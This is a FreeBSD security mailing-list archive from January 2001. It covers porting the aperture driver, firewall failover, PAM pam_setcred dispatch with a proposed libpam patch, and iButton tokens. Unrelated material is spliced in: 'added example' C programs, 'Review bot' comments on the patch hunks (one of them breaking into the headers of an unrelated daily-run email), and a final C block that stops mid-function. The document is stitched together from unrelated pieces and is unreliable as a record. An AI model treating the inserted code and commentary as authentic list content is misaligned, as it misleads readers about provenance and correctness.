From owner-freebsd-security Sun Jan 21 12:52:50 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 0B66937B400 for ; Sun, 21 Jan 2001 12:52:33 -0800 (PST)
Received: (qmail 17193 invoked by uid 0); 21 Jan 2001 20:52:29 -0000
Received: from pc19ebf65.dip.t-dialin.net (HELO forge.local) (193.158.191.101) by mail.gmx.net (mp002-rz3) with SMTP; 21 Jan 2001 20:52:29 -0000
Received: from thomas by forge.local with local (Exim 3.16 #1 (Debian)) id 14KRTN-0000de-00 for ; Sun, 21 Jan 2001 21:52:25 +0100
Date: Sun, 21 Jan 2001 21:52:25 +0100
To: freebsd-security@freebsd.org
Subject: aperture driver for FreeBSD
Message-ID: <20010121215225.A2033@crow.dom2ip.de>
Mail-Followup-To: tmoestl@gmx.net, freebsd-security@freebsd.org
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
From: Thomas Moestl
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi,

as I have mentioned some time ago on this list, I have been porting the
XFree86/OpenBSD aperture "driver" to FreeBSD. For those who do not know,
the OpenBSD aperture driver enables running X even when the securelevel is
raised by allowing access to the memory range from 0xa0000 to 0xfffff (via
/dev/mem) and to all io ports (via i386_iopl).

I have extended the concept to allow a list of io and memory regions for
which access is allowed. These regions are settable via a machdep sysctl
(the implementation is currently only for the i386 arch, but should be
relatively easy to port). Another sysctl knob is used to turn the aperture
driver on and off, and set the mode. There are currently two modes defined,
one gives access to the io regions as defined in the respective sysctl when
a process opens /dev/io (using the io permission bitmap), and the second
will give full port access (using IOPL). The second mode is needed because
some XFree86 drivers use cli and sti (ugh!), but it is obviously less
secure.

A great disadvantage of the first mode is that processes will just get a
SIGBUS when trying to access a forbidden port (even when it has opened
/dev/io, which should guarantee full io privileges). This is admittedly
unclean; the relevant applications should be changed to use
i386_set_ioperm (which was modified to allow access to the specified port
ranges even when securelevel is raised, provided that the aperture driver
was enabled via the respective sysctl). This change is apparently very
non-trivial for X. Unfortunately, it is also not easy to figure out the
port ranges X wants to access for a specified driver; using only the
detected io range for the card (plus maybe some static additions) will not
work for at least some drivers.
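The first aperture mode described in this post, modelled in C as an added example (this is not code from the post, from the aperture patch, or from the kernel): an I/O permission bitmap in the i386 TSS convention (one bit per port, set bit = fault) is built from an allowed-range list, so a port outside the list faults instead of being reachable, and the number of ports the list exposes is counted against the 65536 that IOPL (the second mode) opens. The bitmap is computed in user space rather than by calling i386_set_ioperm(), so it runs on any host. The range-list layout, the VGA range and the card range are constructed for the illustration; the patch's sysctl syntax is not on the page and is not reproduced.

```c
/* Added example (not from the original post or the aperture patch): a
 * user-space model of the first aperture mode, in which a process that opens
 * /dev/io is granted only the port ranges on the allowed list. The bitmap
 * follows the i386 TSS convention (one bit per port, set bit = #GP, which the
 * process sees as SIGBUS). Building it here instead of calling
 * i386_set_ioperm() keeps the example runnable on any host. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IO_PORTS      65536
#define IOPERM_BYTES  (IO_PORTS / 8)

struct io_range { uint16_t first, last; };          /* inclusive bounds */
typedef struct { uint8_t map[IOPERM_BYTES]; } ioperm_bitmap;

/* Start from "every port faults", the state a raised securelevel implies. */
static void ioperm_deny_all(ioperm_bitmap *bm)
{
    memset(bm->map, 0xff, sizeof bm->map);
}

/* Clear the fault bits for one allowed range; -1 for an inverted range. */
static int ioperm_allow_range(ioperm_bitmap *bm, struct io_range r)
{
    if (r.first > r.last)
        return -1;
    for (uint32_t p = r.first; p <= r.last; p++)
        bm->map[p >> 3] &= (uint8_t)~(1u << (p & 7));
    return 0;
}

/* Apply a whole allowed-list: what the kernel would let i386_set_ioperm()
 * do once the aperture sysctl is enabled. A bad entry rejects the list. */
static int ioperm_apply_list(ioperm_bitmap *bm, const struct io_range *list, size_t n)
{
    ioperm_deny_all(bm);
    for (size_t i = 0; i < n; i++)
        if (ioperm_allow_range(bm, list[i]) != 0)
            return -1;
    return 0;
}

/* 1 if IN/OUT on this port would be allowed, 0 if it would fault. */
static int ioperm_port_allowed(const ioperm_bitmap *bm, uint16_t port)
{
    return (bm->map[port >> 3] & (1u << (port & 7))) == 0;
}

/* Number of ports reachable: the surface mode 1 exposes, versus all
 * IO_PORTS under IOPL (mode 2). */
static unsigned ioperm_count_allowed(const ioperm_bitmap *bm)
{
    unsigned n = 0;
    for (uint32_t p = 0; p < IO_PORTS; p++)
        n += ioperm_port_allowed(bm, (uint16_t)p);
    return n;
}

/* Constructed sample list: the VGA register window plus one hypothetical
 * card-specific range; this is not the patch's sysctl syntax. */
static const struct io_range sample_list[] = {
    { 0x3b0, 0x3df },    /* VGA/MDA/CGA registers */
    { 0xe800, 0xe8ff },  /* hypothetical detected io range of a card */
};
#define SAMPLE_LEN (sizeof sample_list / sizeof sample_list[0])

static int sample_port_allowed(uint16_t port)
{
    ioperm_bitmap bm;
    return ioperm_apply_list(&bm, sample_list, SAMPLE_LEN) == 0
        && ioperm_port_allowed(&bm, port);
}

static unsigned sample_exposed_ports(void)
{
    ioperm_bitmap bm;
    if (ioperm_apply_list(&bm, sample_list, SAMPLE_LEN) != 0)
        return 0;
    return ioperm_count_allowed(&bm);
}

/* An inverted range must be rejected rather than silently widening access. */
static int inverted_range_rejected(void)
{
    ioperm_bitmap bm;
    struct io_range bad = { 0x3df, 0x3b0 };
    return ioperm_apply_list(&bm, &bad, 1) == -1;
}

int main(void)
{
    printf("port 0x3c0 (VGA)      allowed: %d\n", sample_port_allowed(0x3c0));
    printf("port 0x060 (keyboard) allowed: %d\n", sample_port_allowed(0x060));
    printf("ports exposed by the list: %u of %d\n", sample_exposed_ports(), IO_PORTS);
    return 0;
}
```

With the constructed list the bitmap exposes 304 ports (48 VGA registers plus a 256-port card window) instead of all 65536; every port outside the two ranges keeps its fault bit, which is the SIGBUS the post describes for a process that opened /dev/io and then touches a port it was not granted.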
The patch is at http://www.tu-bs.de/~y0015675/aperture.diff , and a little
additional info can be found at http://www.tu-bs.de/~y0015675/README.aperture

Any comments? Any chance that this can go in someday?

	- thomas

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Jan 21 12:58:32 2001
Delivered-To: freebsd-security@freebsd.org
Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id 4E97137B401 for ; Sun, 21 Jan 2001 12:58:14 -0800 (PST)
Received: by puck.firepipe.net (Postfix, from userid 1000) id 8CF9D19C5; Sun, 21 Jan 2001 15:58:13 -0500 (EST)
Date: Sun, 21 Jan 2001 15:58:13 -0500
From: Will Andrews
To: Thomas Moestl
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: aperture driver for FreeBSD
Message-ID: <20010121155813.G1663@puck.firepipe.net>
Reply-To: Will Andrews
References: <20010121215225.A2033@crow.dom2ip.de>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Pgaa2uWPnPrfixyx"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010121215225.A2033@crow.dom2ip.de>; from tmoestl@gmx.net on Sun, Jan 21, 2001 at 09:52:25PM +0100
X-Operating-System: FreeBSD 4.2-STABLE i386
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

--Pgaa2uWPnPrfixyx
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Sun, Jan 21, 2001 at 09:52:25PM +0100, Thomas Moestl wrote:
> as I have mentioned some time ago on this list, I have been porting the
> XFree86/OpenBSD aperture "driver" to FreeBSD.
[...]

Wow!  This is really cool.  Thanks, Thomas.  Just one question - why is
it i386 only?  Why can't it be MI?
--=20
wca

--Pgaa2uWPnPrfixyx
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6a01kF47idPgWcsURAnmiAJ9oEmhmnUIqLmnLco9WBzkYFwMjrwCfeDHV
qfEp6yZXyUCoG4zqMM8qL8g=
=FQZ4
-----END PGP SIGNATURE-----

--Pgaa2uWPnPrfixyx--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Jan 21 13:43:19 2001
Delivered-To: freebsd-security@freebsd.org
Received: from netau1.alcanet.com.au (ntp.alcanet.com.au [203.62.196.27]) by hub.freebsd.org (Postfix) with ESMTP id EB71D37B400 for ; Sun, 21 Jan 2001 13:43:00 -0800 (PST)
Received: from mfg1.cim.alcatel.com.au (mfg1.cim.alcatel.com.au [139.188.23.1]) by netau1.alcanet.com.au (8.9.3 (PHNE_22672)/8.9.3) with ESMTP id IAA21385 for ; Mon, 22 Jan 2001 08:42:56 +1100 (EDT)
Received: from gsmx07.alcatel.com.au by cim.alcatel.com.au (PMDF V5.2-32 #37645) with ESMTP id <01JZ79WY3KFKIB9ET6@cim.alcatel.com.au> for freebsd-security@FreeBSD.ORG; Mon, 22 Jan 2001 08:42:50 +1100
Received: (from jeremyp@localhost) by gsmx07.alcatel.com.au (8.11.1/8.11.1) id f0LLgpT65053 for freebsd-security@FreeBSD.ORG; Mon, 22 Jan 2001 08:42:51 +1100 (EST envelope-from jeremyp)
Content-return: prohibited
Date: Mon, 22 Jan 2001 08:42:51 +1100
From: Peter Jeremy
Subject: Re: Failover firewalls with ipfw?
In-reply-to: ; from sean@rentul.net on Fri, Jan 19, 2001 at 02:30:38PM -0500
To: freebsd-security@FreeBSD.ORG
Mail-followup-to: freebsd-security@FreeBSD.ORG
Message-id: <20010122084251.N9165@gsmx07.alcatel.com.au>
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-disposition: inline
User-Agent: Mutt/1.2.5i
References:
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 2001-Jan-19 14:30:38 -0500, Sean Lutner wrote:
> Does anyone out there know of any utilities/code/addons I could use to
> implement a failover pair of firewalls using ipfw and fbsd?

As a related issue, has anyone developed code that would allow two boxes
to share natd map entries?  (dummynet is a requirement, so suggestions to
use IPfilter/IPnat, or similar, won't work).  This would allow a NAT'd TCP
connection to fail-over between two boxes.

Peter

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Jan 21 15:32:56 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id C017337B404 for ; Sun, 21 Jan 2001 15:32:38 -0800 (PST)
Received: (qmail 23913 invoked by uid 0); 21 Jan 2001 21:43:05 -0000
Received: from pc19ebf65.dip.t-dialin.net (HELO forge.local) (193.158.191.101) by mail.gmx.net (mp004-rz3) with SMTP; 21 Jan 2001 21:43:05 -0000
Received: from thomas by forge.local with local (Exim 3.16 #1 (Debian)) id 14KSGL-0000ga-00 for ; Sun, 21 Jan 2001 22:43:01 +0100
Date: Sun, 21 Jan 2001 22:43:01 +0100
From: Thomas Moestl
To: freebsd-security@FreeBSD.ORG
Subject: Re: aperture driver for FreeBSD
Message-ID: <20010121224301.A2624@crow.dom2ip.de>
Mail-Followup-To: Thomas Moestl , freebsd-security@FreeBSD.ORG
References: <20010121215225.A2033@crow.dom2ip.de> <20010121155813.G1663@puck.firepipe.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010121155813.G1663@puck.firepipe.net>; from will@physics.purdue.edu on Sun, Jan 21, 2001 at 03:58:13PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sun, Jan 21, 2001 at 03:58:13PM -0500, Will Andrews wrote:
> On Sun, Jan 21, 2001 at 09:52:25PM +0100, Thomas Moestl wrote:
> > as I have mentioned some time ago on this list, I have been porting the
> > XFree86/OpenBSD aperture "driver" to FreeBSD.
> [...]
>
> Wow!  This is really cool.  Thanks, Thomas.  Just one question - why is
> it i386 only?  Why can't it be MI?

Some of the modified code (i386/i386/mem.c and i386/i386/sys_machdep.c) is
architecture specific. The sysctl parsing and list keeping code is largely
separated, and it should not be too difficult to add the necessary bits to
the alpha mem.c. I am working on this, but I have no means to test the
changes. For any newly added architecture (eg. arm?), handlers for its
specific io access method will have to be added (if they need aperture).
	- thomas

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jan 22 6:55:20 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 685A337B401 for ; Mon, 22 Jan 2001 06:55:00 -0800 (PST)
Received: from hamlet.nectar.com (hamlet.nectar.com [10.0.1.102]) by gw.nectar.com (Postfix) with ESMTP id BAF13193E4; Mon, 22 Jan 2001 08:54:59 -0600 (CST)
Received: (from nectar@localhost) by hamlet.nectar.com (8.11.1/8.9.3) id f0MEsxk93199; Mon, 22 Jan 2001 08:54:59 -0600 (CST) (envelope-from nectar@spawn.nectar.com)
Date: Mon, 22 Jan 2001 08:54:59 -0600
From: "Jacques A. Vidrine"
To: "David J. MacKenzie"
Cc: freebsd-security@freebsd.org
Subject: Re: Fwd: [PAM broken design? pam_setcred]
Message-ID: <20010122085459.A93103@hamlet.nectar.com>
Mail-Followup-To: "Jacques A. Vidrine" , "David J. MacKenzie" , freebsd-security@freebsd.org
References: <20010119210820.111B912686@jenkins.web.us.uu.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010119210820.111B912686@jenkins.web.us.uu.net>; from djm@web.us.uu.net on Fri, Jan 19, 2001 at 04:08:20PM -0500
X-Url: http://www.nectar.com/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Jan 19, 2001 at 04:08:20PM -0500, David J. MacKenzie wrote:
> > Regardless of whether you authenticate with `skey', `krb5', or `unix',
> > pam_sm_setcred is called in pam_skey.so, i.e. the module search starts
> > over.  By my reading of the Solaris man page, pam_sm_setcred should be
> > called in the module that successfully authenticated the user.  At any
> > rate this seems infinitely more useful.
> >
> > Excerpt from Solaris 2.6 pam(3):
> >
> >   If the user has been successfully authenticated, the application
> >   calls pam_setcred() to set any user credentials associated with
> >   the authentication service. [...] For example, during the call to
> >   pam_authenticate(), service modules may store data in the handle
> >   that is intended for use by pam_setcred().
>
> I think the PAM spec is unclear on this.
> The way ports/security/pam_krb5 handles this situation is:
>
> In pam_sm_authenticate() it does:
>
>     if ((pamret = pam_set_data(pamh, "ccache", ccache, cleanup_cache)) != 0) {
>         DLOG("pam_set_data()", pam_strerror(pamh, pamret));
>         (void) krb5_cc_destroy(pam_context, ccache);
>         pamret = PAM_SERVICE_ERR;
>         goto cleanup;
>     }
>
> In pam_sm_setcred() and pam_sm_acct_mgmt() it does:
>
>     if (pam_get_data(pamh, "ccache", (const void **) &ccache)) {
>         /* User did not use krb5 to login */
>         DLOG("ccache", "not found");
>         return PAM_SUCCESS;
>     }
>
> That is, if there's no data stored by its authenticate function,
> that means the user authenticated using some other PAM module.
> So it punts and returns success (meaning "I pass, no-op" in this case).
> This seems reasonable.

That's all fine and good, but pam_sm_setcred in pam_krb5 is unlikely to
get called.

This is roughly what is happening (example has config with pam_skey then
pam_krb5):

  application:  pam_authenticate()
    libpam:       pam_dispatch()
      pam_skey:     pam_sm_authenticate()   /* fail */
      pam_krb5:     pam_sm_authenticate()   /* success */
  application:  pam_setcred()
    libpam:       pam_dispatch()
      pam_skey:     pam_sm_setcred()        /* success */
      pam_krb5:                             /* not called */

Does that make it clearer?

-- 
Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jan 22 9:45: 4 2001
Delivered-To: freebsd-security@freebsd.org
Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id 2503D37B400 for ; Mon, 22 Jan 2001 09:44:46 -0800 (PST)
Received: from algroup.co.uk ([193.195.56.225]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id RAA26716; Mon, 22 Jan 2001 17:43:44 GMT
Message-ID: <3A6C714F.78476DA8@algroup.co.uk>
Date: Mon, 22 Jan 2001 17:43:43 +0000
From: Adam Laurie
Organization: A.L. Group plc
X-Mailer: Mozilla 4.76 [en] (Win95; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Jorge Peixoto Vasquez
Cc: security@freebsd.org
Subject: Re: [Fwd: A wish and a dream...]
References: <3A684CD9.A6B77B86@aker.com.br>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Jorge Peixoto Vasquez wrote:
>
>
>
> ------------------------------------------------------------------------
>
> Subject: Re: A wish and a dream...
> Date: Fri, 19 Jan 2001 10:24:03 -0200
> From: Jorge Peixoto Vasquez
> Organization: Aker Security Solutions
> To: James Wyatt
> References:
>
> James Wyatt wrote:
> >
> > The iButton also has a CryptoKey which can hold actual passphrases or
> > passwords intact until you give it a key. Maybe I also want the
> > temperature when I authenticate... (^_^) The iButton stuff isn't hard to
> > handle. It would be nice to have a PAM interface for it. - Jy@
>
> More than just that. It can hold your private key and do the actual RSA
> processing if you have the password. By doing that, it ensures your key
> is never copied. It is just like the normal crypto-smartcards like
> CryptoFlex from Schlumberger (www.slb.com).

and here's some FreeBSD-friendly source to get you started... :)

  http://anoncvs.aldigital.co.uk/iBLab/

cheers,
Adam
-- 
Adam Laurie                   Tel: +44 (20) 8742 0755
A.L. Digital Ltd.             Fax: +44 (20) 8742 5995
Voysey House                  http://www.thebunker.net
Barley Mow Passage            http://www.aldigital.co.uk
London W4 4GB                 mailto:adam@algroup.co.uk
UNITED KINGDOM                PGP key on keyservers

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jan 22 12:37:59 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id B241F37B401 for ; Mon, 22 Jan 2001 12:37:41 -0800 (PST)
Received: (qmail 25650 invoked by uid 0); 22 Jan 2001 20:37:40 -0000
Received: from p3ee21646.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.70) by mail.gmx.net (mail08) with SMTP; 22 Jan 2001 20:37:40 -0000
Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id SAA25234 for freebsd-security@FreeBSD.ORG; Mon, 22 Jan 2001 18:01:03 +0100
Date: Mon, 22 Jan 2001 18:01:03 +0100
From: Gerhard Sittig
To: freebsd-security@FreeBSD.ORG
Subject: Re: Failover firewalls with ipfw?
Message-ID: <20010122180102.V253@speedy.gsinet>
Mail-Followup-To: freebsd-security@FreeBSD.ORG
References: <20010122084251.N9165@gsmx07.alcatel.com.au>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <20010122084251.N9165@gsmx07.alcatel.com.au>; from peter.jeremy@alcatel.com.au on Mon, Jan 22, 2001 at 08:42:51AM +1100
Organization: System Defenestrators Inc.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, Jan 22, 2001 at 08:42 +1100, Peter Jeremy wrote:
>
> As a related issue, has anyone developed code that would allow
> two boxes to share natd map entries?  (dummynet is a
> requirement, so suggestions to use IPfilter/IPnat, or similar,
> won't work).  This would allow a NAT'd TCP connection to
> fail-over between two boxes.

Although I never did this, the list archive holds repeated reports on
successfully running ipf and ipfw in tandem.  So you can use ipfw for
dummynet (and maybe uid / gid stuff?) and ipf for filtering /
translating.  See the archive for the sequence the packets are handed
up in.  Or UTSL.


virtually yours   82D1 9B9C 01DC 4FB4 D7B4  61BE 3F49 4F77 72DE DA76
Gerhard Sittig   true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
-- 
     If you don't understand or are scared by any of the above
             ask your parents or an adult to help you.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jan 22 12:57: 1 2001
Delivered-To: freebsd-security@freebsd.org
Received: from jenkins.web.us.uu.net (jenkins.web.us.uu.net [208.240.88.32]) by hub.freebsd.org (Postfix) with ESMTP id 84EE437B402 for ; Mon, 22 Jan 2001 12:56:40 -0800 (PST)
Received: by jenkins.web.us.uu.net (Postfix, from userid 515) id CDEE112686; Mon, 22 Jan 2001 15:56:24 -0500 (EST)
To: djm@web.us.uu.net, n@nectar.com
Subject: Re: Fwd: [PAM broken design? pam_setcred]
Cc: freebsd-security@freebsd.org
Message-Id: <20010122205624.CDEE112686@jenkins.web.us.uu.net>
Date: Mon, 22 Jan 2001 15:56:24 -0500 (EST)
From: djm@web.us.uu.net (David J. MacKenzie)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> That's all fine and good, but pam_sm_setcred in pam_krb5 is unlikely
> to get called.
>
> This is roughly what is happening (example has config with pam_skey
> then pam_krb5):
>
>   application:  pam_authenticate()
>     libpam:       pam_dispatch()
>       pam_skey:     pam_sm_authenticate()   /* fail */
>       pam_krb5:     pam_sm_authenticate()   /* success */
>   application:  pam_setcred()
>     libpam:       pam_dispatch()
>       pam_skey:     pam_sm_setcred()        /* success */
>       pam_krb5:                             /* not called */
>
> Does that make it clearer?

Ya...  So, a combination of the pam_get_item technique that pam_krb5
uses, and the Solaris (not Linux-PAM) behavior for dispatching
pam_sm_setcred(), would do what you want, right?

Given that multiple pam_sm_authenticate() functions might have succeeded,
we could either do like Solaris and overkill, calling all auth modules'
pam_sm_setcred() functions, or we could keep some state--a list of the
auth modules whose pam_sm_authenticate() functions succeeded.  That's
what you suggested originally, I believe.  That approach assumes that
applications that don't call pam_authenticate(), such as ones that use
Kerberos for authentication, also shouldn't call pam_setcred().  Perhaps
that's reasonable; again, it's poorly documented.

Which way it is matters to me for my MIT krb5 PAM patches.  It would
probably be simpler to be compatible with the undocumented Solaris
dispatch behavior.  Here is a patch to do that that is at least close to
being right.  I'm not 100% sure that it handles all combinations of
return values in various orders the same way that Solaris does.

--- contrib/libpam/libpam/pam_handlers.c 2001/01/22 20:19:52 1.1 +++ contrib/libpam/libpam/pam_handlers.c 2001/01/22 20:22:44 @@ -500,6 +500,8 @@ #endif char *mod_full_path=NULL; servicefn func, func2; + int actions2buf[_PAM_RETURN_VALUES]; + int *actions2 = actions; int success; D(("called."));
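Review bot: in the `@@ -500,6 +500,8 @@` hunk the new `actions2buf` is never initialised here and `int *actions2 = actions;` is what keeps every handler type other than auth behaving as before; a comment on the declaration saying that `actions2` is redirected to the buffer only for the auth stack would spare the next reader from having to find the later `PAM_T_AUTH` case to confirm the buffer is not read uninitialised.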
@@ -649,6 +651,19 @@ _sym = "_pam_sm_authenticate"; _sym2 = "_pam_sm_setcred"; #endif + actions2 = actions2buf; + /* Always run the pam_sm_setcred for all listed auth modules. Otherwise, we can end up not running the pam_sm_setcred for auth module(s) that authenticated successfully, e.g. if an earlier auth module is "sufficient" and its authenticate fails but its setcred succeeds. This is also apparently what Solaris PAM does. */ + { + int i; + for (i = 0; i < _PAM_RETURN_VALUES; i++) + actions2[i] = _PAM_ACTION_IGNORE; + actions2[PAM_SUCCESS] = _PAM_ACTION_OK; + } break; case PAM_T_SESS: handler_p = &the_handlers->open_session; @@ -780,7 +795,7 @@ (*handler_p2)->must_fail = must_fail; /* failure forced? */ (*handler_p2)->func = func2; - memcpy((*handler_p2)->actions,actions,sizeof((*handler_p2)->actions)); + memcpy((*handler_p2)->actions,actions2,sizeof((*handler_p2)->actions)); (*handler_p2)->argc = argc; if (argv) { if (((*handler_p2)->argv = malloc(argvlen)) == NULL) {

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jan 22 18: 7: 3 2001
Delivered-To: freebsd-security@freebsd.org
Received: from kyra.unloved.org (kyra.unloved.org [62.58.62.162]) by hub.freebsd.org (Postfix) with ESMTP id 328FD37B400; Mon, 22 Jan 2001 18:06:14 -0800 (PST)
Received: by kyra.unloved.org (Postfix) id 13586F431; Tue, 23 Jan 2001 03:06:08 +0100 (CET)
Delivered-To: ashp@unloved.org
Received: by kyra.unloved.org (Postfix, from userid 0) id 7E839F40E; Tue, 23 Jan 2001 03:06:07 +0100 (CET)
To: root@unloved.org
Subject: kyra.unloved.org daily run output
Message-Id: <20010123020607.7E839F40E@kyra.unloved.org>
Date: Tue, 23 Jan 2001 03:06:07 +0100 (CET)
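Review bot: in the `@@ -649,6 +651,19 @@` hunk the setcred table maps every return value except PAM_SUCCESS to `_PAM_ACTION_IGNORE`, so a pam_sm_setcred() that fails in the module which actually authenticated the user is discarded and pam_setcred() still reports success as long as some other module's setcred returned PAM_SUCCESS; either map the error codes to `_PAM_ACTION_BAD`, or extend the block comment to say explicitly that setcred failures are deliberately masked so that modules which did not authenticate the user cannot break the stack, since that trade-off is the whole point of the table and is not stated.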
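Review bot: in the `@@ -780,7 +795,7 @@` hunk the memcpy source becomes `actions2` while the length stays `sizeof((*handler_p2)->actions)`; `actions2` may now point at the local `actions2buf[_PAM_RETURN_VALUES]` rather than the caller's array, so a one-line comment (or a compile-time check) that both are `_PAM_RETURN_VALUES` ints would document why the copy stays in bounds.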
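The dispatch sequence Jacques Vidrine traced earlier in this thread, and the effect of the setcred action table in David MacKenzie's patch, modelled in C as an added example (this is not code from the thread or from libpam): a reduced pam_dispatch() runs over a constructed stack of pam_skey then pam_krb5. Both entries are treated as "sufficient", which is an assumption (the thread does not state the control flags), and the return codes, the module stack and the two action-table builders are constructed for the illustration; the dispatch loop is a simplification of libpam's, not its source.

```c
/* Added example, not code from the thread or from libpam: a reduced model
 * of libpam's stack dispatch, showing why pam_sm_setcred() of the module
 * that actually authenticated the user may never run, and what the patch's
 * "run setcred for every listed auth module" action table changes.
 * The stack (pam_skey then pam_krb5, both "sufficient") and every return
 * value below are constructed for the illustration. */
#include <stdio.h>
#include <string.h>

/* Reduced subset of PAM return codes, used as indices into action tables. */
enum { PAM_SUCCESS = 0, PAM_AUTH_ERR, PAM_CRED_ERR, PAM_PERM_DENIED, PAM_RETURN_VALUES };
/* Reduced subset of libpam's per-return-value actions. */
enum { ACTION_IGNORE, ACTION_OK, ACTION_DONE, ACTION_BAD };

struct module {
    const char *name;
    int auth_ret;     /* what this module's pam_sm_authenticate() returns */
    int setcred_ret;  /* what this module's pam_sm_setcred() returns */
};

/* Which modules were invoked, in order, during one dispatch. */
struct call_log { const char *names[8]; int n; };

static void log_call(struct call_log *lg, const char *name)
{
    if (lg->n < 8)
        lg->names[lg->n++] = name;
}

/* "sufficient": success ends the stack, anything else is ignored. */
static void actions_sufficient(int actions[PAM_RETURN_VALUES])
{
    for (int i = 0; i < PAM_RETURN_VALUES; i++)
        actions[i] = ACTION_IGNORE;
    actions[PAM_SUCCESS] = ACTION_DONE;
}

/* The table the patch installs for the setcred side of each auth entry:
 * every module is visited, success counts, everything else is ignored. */
static void actions_setcred_all(int actions[PAM_RETURN_VALUES])
{
    for (int i = 0; i < PAM_RETURN_VALUES; i++)
        actions[i] = ACTION_IGNORE;
    actions[PAM_SUCCESS] = ACTION_OK;
}

/* Reduced pam_dispatch(): walk the stack and apply the action selected by
 * each module's return value. One table serves the whole stack here; real
 * libpam keeps one per entry. */
static int dispatch(const struct module *stack, int n, const int *actions,
                    int setcred, struct call_log *lg)
{
    int impression = 0;            /* 0 undecided, 1 positive, -1 negative */
    int status = PAM_PERM_DENIED;

    for (int i = 0; i < n; i++) {
        int ret = setcred ? stack[i].setcred_ret : stack[i].auth_ret;
        log_call(lg, stack[i].name);
        switch (actions[ret]) {
        case ACTION_OK:
            if (impression == 0) { impression = 1; status = ret; }
            break;
        case ACTION_DONE:              /* stop here unless already failed */
            if (impression >= 0) return PAM_SUCCESS;
            break;
        case ACTION_BAD:
            if (impression >= 0) { impression = -1; status = ret; }
            break;
        default:                       /* ACTION_IGNORE */
            break;
        }
    }
    return impression == 0 ? PAM_PERM_DENIED : status;
}

/* pam_authenticate() followed by pam_setcred() over the constructed stack.
 * patched == 0: setcred reuses the auth table (what the trace above shows);
 * patched == 1: the patch's all-modules table. Returns pam_setcred()'s
 * status; *lg receives the order in which pam_sm_setcred() was called. */
static int run_login(int patched, int krb5_setcred_ret, struct call_log *lg)
{
    const struct module stack[2] = {
        { "pam_skey", PAM_AUTH_ERR, PAM_SUCCESS },       /* not an S/Key user */
        { "pam_krb5", PAM_SUCCESS,  krb5_setcred_ret },  /* the module that authenticated */
    };
    int auth_actions[PAM_RETURN_VALUES], cred_actions[PAM_RETURN_VALUES];
    struct call_log auth_log = { {0}, 0 };

    actions_sufficient(auth_actions);
    if (dispatch(stack, 2, auth_actions, 0, &auth_log) != PAM_SUCCESS)
        return PAM_AUTH_ERR;
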